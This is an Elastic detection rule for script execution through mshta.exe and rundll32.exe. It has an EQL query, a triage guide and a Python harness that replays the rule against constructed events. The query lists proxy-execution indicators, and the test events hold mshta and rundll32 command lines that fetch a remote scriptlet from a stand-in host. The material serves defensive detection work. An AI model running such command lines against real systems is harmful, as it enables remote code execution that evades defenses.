Script Execution via Microsoft HTML Application
Identifies the execution of scripts via HTML applications using Windows utilities rundll32.exe or mshta.exe. Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed binaries.
Elastic rule (View on GitHub)
[metadata]
creation_date = "2020/09/09"
integration = ["windows", "system", "sentinel_one_cloud_funnel", "m365_defender"]
maturity = "production"
min_stack_comments = "Breaking change at 8.14.0 for the Windows Integration."
min_stack_version = "8.14.0"
updated_date = "2025/01/15"

[rule]
author = ["Elastic"]
description = """
Identifies the execution of scripts via HTML applications using Windows utilities rundll32.exe or mshta.exe.
Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed
binaries.
"""
from = "now-9m"
index = [
  "winlogbeat-*",
  "logs-windows.*",
  "logs-system.security*",
  "logs-windows.sysmon_operational-*",
  "logs-sentinel_one_cloud_funnel.*",
  "logs-m365_defender.event-*"
]
language = "eql"
license = "Elastic License v2"
name = "Script Execution via Microsoft HTML Application"
risk_score = 73
rule_id = "181f6b23-3799-445e-9589-0018328a9e46"
severity = "high"
tags = [
  "Domain: Endpoint",
  "OS: Windows",
  "Use Case: Threat Detection",
  "Tactic: Defense Evasion",
  "Data Source: System",
  "Data Source: Sysmon",
  "Data Source: SentinelOne",
  "Data Source: Microsoft Defender for Endpoint",
  "Resources: Investigation Guide"
]
timestamp_override = "event.ingested"
type = "eql"

query = '''
process where host.os.type == "windows" and event.type == "start" and
  process.name : ("rundll32.exe", "mshta.exe") and
  (
    (process.command_line :
      (
        "*script*eval(*",
        "*script*GetObject*",
        "*.regread(*",
        "*WScript.Shell*",
        "*.run(*",
        "*).Exec()*",
        "*mshta*http*",
        "*mshtml*RunHTMLApplication*",
        "*mshtml*,#135*",
        "*StrReverse*",
        "*.RegWrite*",
        /* Issue #379 */
        "*window.close(*",
        "* Chr(*"
      )
      and not process.parent.executable :
        ("?:\\Program Files (x86)\\Citrix\\System32\\wfshell.exe",
         "?:\\Program Files (x86)\\Microsoft Office\\Office*\\MSACCESS.EXE",
         "?:\\Program Files\\Quokka.Works GTInstaller\\GTInstaller.exe")
    ) or

    (process.name : "mshta.exe" and
      not process.command_line : ("*.hta*", "*.htm*", "-Embedding") and process.args_count >=2) or

    /* Execution of HTA file downloaded from the internet */
    (process.name : "mshta.exe" and process.command_line : "*\\Users\\*\\Downloads\\*.hta*") or

    /* Execution of HTA file from archive */
    (process.name : "mshta.exe" and
      process.args : ("?:\\Users\\*\\Temp\\7z*", "?:\\Users\\*\\Temp\\Rar$*", "?:\\Users\\*\\Temp\\Temp?_*", "?:\\Users\\*\\Temp\\BNZ.*"))
  )
'''
note = """## Triage and analysis

> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.

### Investigating Script Execution via Microsoft HTML Application

Microsoft HTML Applications (HTA) allow scripts to run in a trusted environment, often using utilities like `rundll32.exe` or `mshta.exe`. Adversaries exploit this by executing malicious scripts under the guise of legitimate processes, bypassing defenses. The detection rule identifies suspicious script execution patterns, such as unusual command lines or execution from common download locations, to flag potential abuse.

### Possible investigation steps

- Review the process command line details to identify any suspicious patterns or indicators of malicious activity, such as the presence of script execution commands like "eval", "GetObject", or "WScript.Shell".
- Check the parent process executable path to determine if the process was spawned by a known legitimate application or if it deviates from expected behavior, especially if it is not from the specified exceptions like Citrix, Microsoft Office, or Quokka.Works GTInstaller.
- Investigate the origin of the HTA file, particularly if it was executed from common download locations like the Downloads folder or temporary archive extraction paths, to assess if it was downloaded from the internet or extracted from an archive.
- Analyze the process arguments and count to identify any unusual or unexpected parameters that could indicate malicious intent, especially if the process name is "mshta.exe" and the command line does not include typical HTA or HTM file references.
- Correlate the event with other security logs and alerts from data sources like Sysmon, SentinelOne, or Microsoft Defender for Endpoint to gather additional context and determine if this activity is part of a broader attack pattern.

### False positive analysis

- Execution of legitimate scripts by enterprise applications like Citrix, Microsoft Office, or Quokka.Works GTInstaller can trigger false positives. Users can mitigate this by adding these applications to the exclusion list in the detection rule.
- Scripts executed by mshta.exe that do not involve malicious intent, such as internal web applications or administrative scripts, may be flagged. Users should review these scripts and, if deemed safe, exclude them based on specific command line patterns or parent processes.
- HTA files downloaded from trusted internal sources or vendors might be mistakenly identified as threats. Users can create exceptions for these sources by specifying trusted download paths or file hashes.
- Temporary files created by legitimate software installations or updates in user temp directories can be misinterpreted as malicious. Users should monitor these activities and exclude known safe processes or directories from the detection rule.

### Response and remediation

- Immediately isolate the affected system from the network to prevent further spread of the malicious script or unauthorized access.
- Terminate any suspicious processes identified by the detection rule, specifically those involving `rundll32.exe` or `mshta.exe` with unusual command lines.
- Conduct a thorough scan of the affected system using updated antivirus or endpoint detection and response (EDR) tools to identify and remove any malicious files or scripts.
- Review and analyze the command lines and scripts executed to understand the scope and intent of the attack, and identify any additional compromised systems.
- Restore the affected system from a known good backup if malicious activity is confirmed and cannot be fully remediated.
- Implement network segmentation to limit the ability of similar threats to propagate across the network in the future.
- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems or data have been compromised."""


[[rule.threat]]
framework = "MITRE ATT&CK"
[[rule.threat.technique]]
id = "T1218"
name = "System Binary Proxy Execution"
reference = "https://attack.mitre.org/techniques/T1218/"

[[rule.threat.technique.subtechnique]]
id = "T1218.005"
name = "Mshta"
reference = "https://attack.mitre.org/techniques/T1218/005/"
[[rule.threat.technique.subtechnique]]
id = "T1218.011"
name = "Rundll32"
reference = "https://attack.mitre.org/techniques/T1218/011/"



[rule.threat.tactic]
id = "TA0005"
name = "Defense Evasion"
reference = "https://attack.mitre.org/tactics/TA0005/"
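To see which of the query's four branches a given process-start event trips, and which of the rule's exclusions suppress it, the matching logic is re-implemented below in Python and run over constructed events. This is an added example, not code from the Elastic rule or its repository: it approximates the EQL `:` operator (case-insensitive, whole-string, `*` and `?` wildcards) with `fnmatch`, uses the ECS field names the query reads, and the branch labels, the `proc_event` helper and every sample command line, path and parent are assumptions made for illustration.

```python
"""Run the rule's four query branches over constructed process-start events.

Added example, not part of the Elastic rule. EQL ':' matching is approximated
with fnmatch; SAMPLE_EVENTS are constructed, not real telemetry.
"""
import fnmatch

# Patterns copied from the rule's query (wildcards: '*' any run, '?' one char).
SCRIPT_PATTERNS = [
    "*script*eval(*", "*script*GetObject*", "*.regread(*", "*WScript.Shell*",
    "*.run(*", "*).Exec()*", "*mshta*http*", "*mshtml*RunHTMLApplication*",
    "*mshtml*,#135*", "*StrReverse*", "*.RegWrite*", "*window.close(*", "* Chr(*",
]
PARENT_EXCLUSIONS = [
    r"?:\Program Files (x86)\Citrix\System32\wfshell.exe",
    r"?:\Program Files (x86)\Microsoft Office\Office*\MSACCESS.EXE",
    r"?:\Program Files\Quokka.Works GTInstaller\GTInstaller.exe",
]
HTA_FILE_PATTERNS = ["*.hta*", "*.htm*", "-Embedding"]
DOWNLOADS_PATTERN = r"*\Users\*\Downloads\*.hta*"
ARCHIVE_TEMP_PATTERNS = [
    r"?:\Users\*\Temp\7z*", r"?:\Users\*\Temp\Rar$*",
    r"?:\Users\*\Temp\Temp?_*", r"?:\Users\*\Temp\BNZ.*",
]


def wild(value, pattern):
    """EQL ':' semantics: case-insensitive whole-string match with '*' and '?'."""
    return value is not None and fnmatch.fnmatchcase(str(value).lower(), pattern.lower())


def any_match(value, patterns):
    return any(wild(value, p) for p in patterns)


def matched_branches(ev):
    """Return the labels of the query branches the event satisfies ([] = no alert)."""
    if ev.get("host.os.type") != "windows" or ev.get("event.type") != "start":
        return []
    name = ev.get("process.name")
    if not any_match(name, ["rundll32.exe", "mshta.exe"]):
        return []
    cmd = ev.get("process.command_line")
    hits = []
    # Branch 1: inline script indicators, unless a listed parent spawned it.
    if any_match(cmd, SCRIPT_PATTERNS) and not any_match(
            ev.get("process.parent.executable"), PARENT_EXCLUSIONS):
        hits.append("inline-script")
    if wild(name, "mshta.exe"):
        # Branch 2: mshta with arguments but no .hta/.htm file reference.
        if not any_match(cmd, HTA_FILE_PATTERNS) and ev.get("process.args_count", 0) >= 2:
            hits.append("mshta-no-hta-file")
        # Branch 3: HTA launched from a user's Downloads folder.
        if wild(cmd, DOWNLOADS_PATTERN):
            hits.append("hta-from-downloads")
        # Branch 4: any argument points into an archiver's temp extraction dir.
        if any(any_match(a, ARCHIVE_TEMP_PATTERNS) for a in ev.get("process.args", [])):
            hits.append("hta-from-archive-temp")
    return hits


def proc_event(name, args, parent):
    """Constructed ECS-shaped process start event (shell quoting omitted)."""
    return {
        "host.os.type": "windows", "event.type": "start",
        "process.name": name, "process.args": args, "process.args_count": len(args),
        "process.command_line": " ".join(args), "process.parent.executable": parent,
    }


EXPLORER = r"C:\Windows\explorer.exe"
MSHTA = r"C:\Windows\System32\mshta.exe"
SAMPLE_EVENTS = {  # constructed for illustration; example.invalid is a reserved TLD
    "inline-jscript": proc_event("mshta.exe", ["mshta.exe",
        'javascript:a=GetObject("script:http://example.invalid/x.sct").Exec();close();'], EXPLORER),
    "rundll32-mshtml": proc_event("rundll32.exe", ["rundll32.exe",
        'javascript:"\\..\\mshtml,RunHTMLApplication ";GetObject("script:http://example.invalid/p.sct")'],
        EXPLORER),
    "rundll32-from-msaccess": proc_event("rundll32.exe", ["rundll32.exe",
        'javascript:"\\..\\mshtml,RunHTMLApplication ";window.close()'],
        r"C:\Program Files (x86)\Microsoft Office\Office16\MSACCESS.EXE"),
    "local-hta": proc_event("mshta.exe", [MSHTA, r"C:\Program Files\Contoso\tool.hta"], EXPLORER),
    "hta-from-downloads": proc_event("mshta.exe", [MSHTA, r"C:\Users\alice\Downloads\invoice.hta"], EXPLORER),
    "hta-from-7zip-temp": proc_event("mshta.exe",
        [MSHTA, r"C:\Users\alice\AppData\Local\Temp\7zO4A1B2C3\resume.hta"], EXPLORER),
    # The rule's "-Embedding" pattern carries no wildcard, so it only excludes a
    # command line that is exactly that token; a full path plus -Embedding still
    # satisfies branch 2 here. Check how your own source records COM activation.
    "com-activation": proc_event("mshta.exe", [MSHTA, "-Embedding"], r"C:\Windows\System32\svchost.exe"),
}


def main():
    for label, ev in SAMPLE_EVENTS.items():
        hits = matched_branches(ev)
        print(f"{'ALERT   ' if hits else 'no alert'}  {label}: {hits}")


if __name__ == "__main__":
    main()
```

Running it shows the asymmetry worth knowing before tuning: the three parent-process exclusions only guard the first branch, so an `mshta.exe` child of Citrix `wfshell.exe` that carries `WScript.Shell` on its command line but no `.hta` file reference is still raised by the second branch; the `-Embedding` case is the one to verify against your own telemetry before deciding whether an extra exception is needed.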
Related rules
- Attempt to Install Kali Linux via WSL
- Control Panel Process with Unusual Arguments
- ImageLoad via Windows Update Auto Update Client
- Microsoft Build Engine Started by a System Process
- Potential File Transfer via Certreq